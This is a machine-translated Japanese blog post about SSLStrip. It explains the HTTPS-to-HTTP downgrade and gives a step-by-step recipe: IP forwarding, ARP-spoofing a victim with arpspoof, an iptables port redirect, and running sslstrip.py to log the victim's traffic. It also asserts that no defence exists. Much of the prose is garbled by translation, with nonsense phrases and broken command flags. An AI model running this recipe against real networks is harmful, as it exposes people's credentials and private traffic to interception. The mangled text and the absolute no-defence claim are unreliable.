SSLStrip：SSLトラフィックをスパイする

MoxieMarlinspikeが ブラックハット2009 と呼ばれる気の利いたツール SSLストリップ、 に向け 実際にはすべてのデータがオープンで送信されているときに、SSL暗号化を使用したWebサイトにいるとユーザーに信じ込ませます。 さらに、SSLStripは、サイトが機能しているかのように動作し続けているにもかかわらず、暗号化がバイパスされているとされるWebサーバーをだまします。 私が理解できる限り、この方法はまだうまく機能します。 脅威はまだそこにあり、私たち全員がさらされています。 ブアハハ..。

基本から始めましょう：SSLとは一体何ですか？

知らない人のために、Secure Sockets Layer（SSL; セキュアソケットレイヤープロトコル）とその後継のトランスポートレイヤーセキュリティ（TLS;トランスポートレイヤーセキュリティ）は ネットワーク上で安全な通信を提供する暗号化プロトコル、一般的にインターネット。

SSLは、HTTP、SMTP、NNTPなどのアプリケーションプロトコル間のレイヤー上、およびTCP / IPファミリーのプロトコルの一部であるTCPトランスポートプロトコル上で実行されます。 信頼できる接続（TCPなど）を使用するすべてのプロトコルにセキュリティを提供できますが、ほとんどの場合、HTTPと組み合わせてHTTPSを形成するために使用されます。 HTTPS WebアプリケーションのワールドワイドWebページを保護するために使用されます。 eコマース、公開鍵証明書を使用してエンドポイントのIDを確認します。

SSLStrip…ポルノはLet'sUse Linuxに戻りましたか？

の操作 SSLストリップ それは単純だ、 すべてのHTTPSリクエストを置き換えます HTTPによるWebページの作成後、MITMを実行します（攻撃«中央の男性«）サーバーとクライアントの間。 被害者と攻撃者はHTTPを介して通信し、攻撃者とサーバーはHTTPSを介してサーバーの証明書と通信するという考え方です。 したがって、攻撃者は被害者のプレーンテキストトラフィックをすべて見ることができます。

これは、この優れたツールがどのように機能するかを確認できるビデオです。

SSLStripの使用方法

1.- IP転送を構成する

エコー1> / proc / sys / net / ipv4 / ip_forward

2.- 2台のマシン間でARPMITM攻撃を実行する：

arpspoof -i eth0 -t 犠牲者ホスト

3.- iptablesを使用してトラフィックをリダイレクトします。

iptables -t nat -A PREROUTING -p tcp –宛先ポート 80 -j REDIRECT –ポート 8080

4.- 使用するポートでSSLStripを起動します

python sslstrip.py-wファイル

SSLStrip攻撃から身を守る方法は？

これは最も美しくてひどいです： できない.

Moxieによって示されているように（彼の ビデオ 69分強が無駄になることはありません）これに対する唯一の考えられる解決策は、すべてのHTTP接続を暗号化することです。つまり、ページやサービス。 モクシーが言ったように、 '安全でないプロトコルに依存する安全なプロトコルは問題です"

少なくともユーザーとして何ができるか 攻撃される可能性を減らす？ 各ページの前に侵害された「https」があること、またはFirefoxユーザーがインストールする場合は、偏見のない方法で確認します。 NoScriptの すべてのページでHTTPS接続を強制します。 それでも、これは効果を最小限に抑えるだけであり、それを否定するものではありません。

出典 ドラゴンジャー & 勇気